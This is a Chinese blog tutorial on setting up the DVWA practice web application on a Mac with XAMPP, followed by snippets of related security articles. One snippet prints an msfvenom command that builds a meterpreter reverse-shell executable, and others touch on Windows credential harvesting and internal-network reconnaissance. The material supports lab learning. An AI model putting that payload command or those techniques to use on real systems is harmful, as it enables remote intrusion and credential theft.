代码编织梦想

DVWA在Mac上的安装配置

此处使用的是XAMPP+DVWA

刚开始配置DVWA,在网上找了一大波教程,其中有几个步骤总是有点懵逼,所以自己写了一个比较简单的配置步骤,希望对大家的学习有帮助。

一、解压安装DVWA

XAMPP下载地址
DVWA下载地址

  1. 安装XAMPP,与普通应用安装相同

  2. 安装好之后运行XAMPP

在这里插入图片描述

  1. 在Services中打开MySQL、 Apache、 ProFTPD服务

在这里插入图片描述

  1. 在NetWork服务中打开localhost:8080 -> 80 服务

在这里插入图片描述

  1. 接下来在Volumes中,点击Mount -> Explore

在这里插入图片描述
在这里插入图片描述

  1. 找到htdocs,将DVWA文件夹改名为DVWA,然后放入htdocs文件夹中

    到这儿之后DVWA就安装完成,接下来还需要配置一下

二、新建账户

  1. 在浏览器中访问localhost找到phpmydmin,并打开
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201202221203973.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1OTQ0NjI2,size_16,color_FFFFFF,t_70)

在这里插入图片描述

  1. 找到账户,点击新建

在这里插入图片描述

注意⚠️:打开全局权限用户账户数据库中的两个服务

三、终端文件配置

  1. 打开XAMPP -> Volumnes -> Explore

  2. 找到文件:lampp/htdocs/dvwa/config/

  3. 用文本编辑器打开config.inc.php.dist文件,作出如下图所示的修改

在这里插入图片描述

配置完成

四、在浏览器上访问http://192.168.64.2/dvwa/login.php

​ 默认用户名: admin

​ 密码: password

配置完成

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_45944626/article/details/110501765

细谈渗透测试的前期工作——信息收集-爱代码爱编程

细谈渗透测试的前期工作——信息收集 前言0x01 收集什么信息0x02 作用和收集方法总结 前言 都说学安全的,查资料找信息什么的都是基本功,收集信息的能力都是杠杠的,经常网上有什么热门的事情,小伙伴们都会来找我帮他们找点瓜吃,也常常让我帮忙找特定的一些岛国教育资料,真是工具人实锤了。。咳咳扯远了,扯远了。 所谓知己知彼,百战不殆,要做好渗透

【渗透笔记】Windows主机信息收集-爱代码爱编程

在拿到webshell的时候,想办法获得系统信息拿到系统权限,进入到网络系统内部之后收集内部网络的各种信息,获取内部网络有价值的人员、资产信息。 内网渗透的第一步,内网信息收集。 环境搭建 ATT&CK靶场二 内网环境分析 内网基础环境判断 IP、网关、DNS、是否能联通外网、网络连接以及端口、本机host文件、机器的代理、是否在域内、

msf中收到了sessions却不反弹meterpreter的原因-爱代码爱编程

msf中收到了sessions却不反弹meterpreter的原因 问题描述: 生成木马 ​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.189.130 lport=12346 -f exe >/hack.exe

CEH v11 笔记总结 Module 2-爱代码爱编程

CEH v11 笔记 Module 2 Footprinting and Reconnaissance 1. Footprinting Concepts 1.1. What is Footprinting An essential aspect of footprinting is identifying the level of risk ass

深信服校园招聘安全攻防A卷-爱代码爱编程

深信服校园招聘安全攻防A卷 1、谈谈在WEB类安全问题的应急处置过程中web日志溯源攻击路径的思路? 在对WEB日志进行安全分析时,可以按照下面两种思路展开,逐步深入,还原整个攻击过程。 首先确定受到攻击的时间范围,以此为线索,查找这个时间范围内可疑的日志,根据可疑ip、攻击特征等进一步排查(WEB日志会记录客户端对WEB应用的访问请求,这其中包括正常

【渗透笔记】Windows密码凭证获取-爱代码爱编程

Windows Hash Windows系统使用两种方法对用户的密码进行哈希处理,它们分别是**LAN Manager(LM)哈希和NT LAN Manager(NTLM)**哈希。 LM哈希存在缺陷,所以新版的win不再使用 LM哈希密码最大长度为14,密码长度超过14位使用NTLM哈 希 所谓哈希(hash),就是使用一种加密函数进行计算后的

Macbook自带软件删除最全教程-爱代码爱编程

Macbook自带软件删除最全教程 Mac中有很多平时用不到的软件比如(快播 TV、查找电话、照片、信息…),尤其是手机从iPhone阵营转HUAWEI阵营之后,太多的软件用不到了,但是每次打开Mac桌面时看到一堆的用不到的软件在眼前晃来晃去,而且在应用程序里还删不掉,简直要逼死强迫症。 今天终于都删掉了,下面给大家讲解如何删除mac自带软件(所谓自带

Mac中的Root账户如何开启!-爱代码爱编程

Root账户也就是超级用户,具有操作系统中最高权限,可以帮助用户安装或者启用一下特殊的设置。虽然Apple不建议用户开启此账户,作为使用者在一些突发状况下还是需要Root账户进行支持,那么要如何开启root账户呢?下面小编就和大家分享一下开启Root账户方法。一起来看看吧! 如何开启Root账户 具体方法: 1.打开“系统偏好设置”,选择“用户与群组

如何使用ReiBoot修复iOS系统-爱代码爱编程

iOS无疑是有史以来最好的移动操作系统,但有时我们的iPhone,iPad或iPod touch可能会遇到麻烦。更新到新的iOS 13,越狱或物理损坏后,可能会发生这些问题。您始终可以重新启动或使用恢复模式还原来解决这些问题,但不能用于严重问题。对于大多数系统问题,您需要修复iOS系统以完全摆脱它们。Tenorshare ReiBoot是一款流程iOS系统

2^n-1的因数分解问题-爱代码爱编程

2^n-1的因数分解问题 我们只讨论正整数集合的问题,N=2n-1 (n∈正整数) 1、 当n=2*i, (i∈正整数) N=22i-1=(2i+1)(2i-1), 其最小因子为:i=1时,2+1=3,(21-1)=1 (因子1不考虑) 较大因子为(2i+1),(2i-1),关于(2i+1)的因子,参考另一篇文章(2n+1)的因数分解问题, (2

黑客不讲武德,苹果好自为之-爱代码爱编程

Python实战社群 Java实战社群 长按识别下方二维码,按需求添加 扫码关注添加客服 进Python社群▲ 扫码关注添加客服 进Java社群▲ 整理 | 褚杏娟、Tina 来源丨InfoQ(ID:infoqchina) 苹果的新系统不仅漏洞百出,还对自家应用程序设置“双标”进行豁免。 上周,在第三场秋季新品发布会上,

CLion连接远程(虚拟)主机开发配置流程-爱代码爱编程

CLion连接远程(虚拟)主机开发配置流程 一、前言 Linux不适合办公,Mac虽然是unix内核,但依然与Linux环境有所差异,虚拟机界面比较卡顿(本人笔记本)不够流畅等等因素,导致本人想利用CLion(本质上是利用ssh)连接远程(虚拟)主机进行开发工作。 二、前置环境介绍 1.macOS Big Sur 11.0.1(本地) 2.ubun